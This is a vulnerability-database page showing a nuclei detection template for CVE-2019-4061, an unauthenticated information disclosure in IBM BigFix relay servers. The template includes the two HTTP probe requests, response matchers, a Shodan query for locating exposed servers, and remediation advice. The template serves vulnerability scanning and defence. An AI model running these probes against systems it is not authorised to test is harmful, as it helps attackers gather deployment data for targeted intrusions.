Lucene search
K

IBM BigFix Platform - Information Disclosure

🗓️ 28 Jun 2026 15:08:32Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

IBM BigFix Platform exposes update and fixlet data via unauthenticated relay, enabling remote disclosure.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-4061
20 Mar 201912:24
circl
CNVD
IBM BigFix Platform Unauthorized Access Vulnerability
25 Feb 201900:00
cnvd
CVE
CVE-2019-4061
27 Feb 201922:00
cve
Cvelist
CVE-2019-4061
27 Feb 201922:00
cvelist
Tenable Nessus
IBM BigFix Platform 9.2.x <= 9.2.16 / 9.5.x <= 9.5.11 Information Disclosure
3 May 201900:00
nessus
NVD
CVE-2019-4061
27 Feb 201922:29
nvd
OSV
CVE-2019-4061
27 Feb 201922:29
osv
Packet Storm
IBM BigFix Relay Server Sites and Package Enum
31 Aug 202400:00
packetstorm
Packet Storm
📄 IBM BigFix Platform 9.2 Information Disclosure
17 Dec 202500:00
packetstorm
Prion
Design/Logic Flaw
27 Feb 201922:29
prion
Rows per page
id: CVE-2019-4061

info:
  name: IBM BigFix Platform - Information Disclosure
  author: daffainfo
  severity: medium
  description: |
    IBM BigFix Platform 9.2 and 9.5 contains an information disclosure vulnerability caused by not enabling authenticated access in relay, letting remote attackers query and gather update and fixlet information, exploit requires no authentication.
  impact: |
    Attackers can remotely gather sensitive update and fixlet deployment information, potentially aiding targeted attacks.
  remediation: |
    Enable authenticated access for relay to prevent unauthorized information queries.
  reference:
    - https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers
    - https://github.com/rapid7/metasploit-framework/blob/0fd8f0984e10a135c000d1fb8797d76d62fb24f7/modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2019-4061
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-4061
    epss-score: 0.22547
    epss-percentile: 0.97416
    cwe-id: CWE-200
    cpe: cpe:2.3:a:ibm:bigfix_platform:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: ibm
    product: bigfix_platform
    shodan-query: port:52311 "BigFixHTTPServer"
  tags: cve,cve2019,ibm,bigfix,disclosure,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/masthead/masthead.axfm"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Organization: ", "-URL: ")'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/bfenterprise/clientregister.exe?RequestType=FetchCommands"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "x-bes-command-hasiteversion:")'
        condition: and
# digest: 4b0a00483046022100e1c99aab903e07d1ad97009be05af8c52881560a088a512dd3ff988f489cc99d022100845e1b7648b76407f875f3fa47aba2ee2dea8ad5d3d180f02fdcd884e43dce77:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 25
CVSS 3.15.3
CVSS 35.3
EPSS0.22547
10